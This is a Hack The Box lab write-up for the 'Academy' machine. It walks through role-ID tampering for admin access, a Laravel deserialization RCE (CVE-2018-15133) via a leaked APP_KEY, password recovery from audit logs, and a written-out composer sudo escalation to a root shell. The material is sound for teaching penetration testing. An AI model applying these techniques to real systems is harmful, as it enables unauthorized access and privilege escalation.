Hack The Box — Academy — Write Up
Academy is an easy difficulty Linux machine that features an Apache server hosting a PHP website. The website is found to be the HTB Academy learning platform. Capturing the user registration request in Burp reveals that we are able to modify the Role ID, which allows us to access an admin portal. This reveals a vhost, that is found to be running on Laravel. Laravel debug mode is enabled, the exposed API Key and vulnerable version of Laravel allow us carry out a deserialization attack that results in Remote Code Execution. Examination of the Laravel .env file for another application reveals a password that is found to work for the cry0l1t3 user, who is a member of the adm group. This allows us to read system logs, and the TTY input audit logs reveals the password for the mrb3n user. mrb3n has been granted permission to execute composer as root using sudo , which we can leverage in order to escalate our privileges.
Scanning and Enumeration
We’ll start with scanning the machine with Nmap.
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
ssh-hostkey: 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
http-server-header: Apache/2.4.41 (Ubuntu)
http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx?
fingerprint-strings:
DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
Invalid message"
HY000After Nmap scan we found the port 22 (SSH), port 80 (HTTP) and port 33060 (MySQL) are open. Now add the IP Address to /etc/hosts file to get the view of web page. When we visit port 80 we find a web page of HTB Academy with two options: Login and Register.
echo "10.10.10.215 academy.htb" >> /etc/hosts # root priv required
We confirm that website is running PHP by navigating to /index.php . This website has “Login” and “Register” links. Let’s enumerate for hidden directories and files. We will be using dirsearch to enumerate webserver path and files.
$ dirsearch.py -u http://academy.htb/[21:45:39] 200 - 3KB - /admin.php <-- Interesting
[21:46:05] 200 - 0B - /config.php <-- Interesting
[21:46:21] 200 - 2KB - /index.php
[21:46:21] 200 - 2KB - /index.php/login/
[21:46:26] 200 - 3KB - /login.php
[21:46:43] 200 - 3KB - /register.php
Dirsearch reveals a lots of PHP files of which admin.php is the most interesting. Browsing to /admin reveals a login page. Attempting to login with our registered user fails. Let’s try to register a new account again, examine the request in Burp Suite and see if we can bypass the login.
We found that there is additional roleid parameter pass through http request so after further recon i found that roleid parameter is used to decide user account privilege so if we change roleid parameter to 0 > 1. we can able to get administration privilege. Logging into login.php with our new credentials doesn’t provide us with any additional functionality, but this time we are able to login at /admin.php .
After logging on we’re greeted with an “Academy Launch Planner”. There are several items that have been completed, but the last item is still pending (Fix issue with dev-staging-01.academy.htb). Let’s add this host to our hosts file, disable the proxy and browse to it.
echo "10.10.10.215 dev-staging-01.academy.htb" >> /etc/hosts
# You need root privThere is laravel log file disclosed which is disclosing sensitive information like Internal paths, server information, environment variables, MySQL credentials etc.so lets move forward to next step.
Exploitation Phase
Laravel in debug mode can also return sensitive information such as the API Key or MySQL credentials, which can be found on scrolling down to the “Environment Variables” section.
Exploiting Laravel Framework Unserialize Token RCE (CVE-2018–15133) using metasploit to gain reverse shell by leaked APP_KEY variable token.
Privilege Escalation
By looking at the /etc/passwd, I noticed multiple users in this box. We recall from the Nmap result that there’s a MySQL instance listening on port 33060. Laravel uses .env files for database configurations (PHP package phpdotenv). On enumerating the file system, we find two Laravel applications are configured, htb-academy-dev-01 and academy . Inspection of the academy Laravel application reveals MySQL credentials in the .env . The main Academy application can be found at /var/www/html/academy , with htb-academy-dev-01 at /var/www/html/htb-academy-dev-01 . Further information about the Laravel environment configuration file is available in this Laravel document. The Academy .env file is below.
Attempting to login into MySQL using the mysql client with these credentials fails. However, password reuse is very common, let’s enumerate the system users and see if any of them use the same password.
The id command reveals that this user is a member of adm group. The adm group allows users to read system logs. In Linux all logs are located inside the /var/log folder. Lets change the directory to /var/log and list the log files.
Auditing SElinux logs files in /var/log/audit to get mrb3n user credential details in hexadecimal format.
$ cat audit.log.3 | grep "data"
type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199304.778:89): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
type=TTY msg=audit(1597199308.262:90): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199317.622:93): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
Running sudo -l with correct password reveals that mrb3n has a sudo entry allowing them to run composer as root.
There is an entry on GTFOBins for composer. It involves creating a composer.json file with a “scripts” property. Composer allow users to execute system command using script options.
After inputting these commands, we successfully obtain a shell as root and can access the root.txt.
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
!!! MACHINE ROOTED !!!
Visit My Hack The Box Profile —
https://app.hackthebox.eu/profile/464208
For any queries contact on my twitter and linkedin profiles -
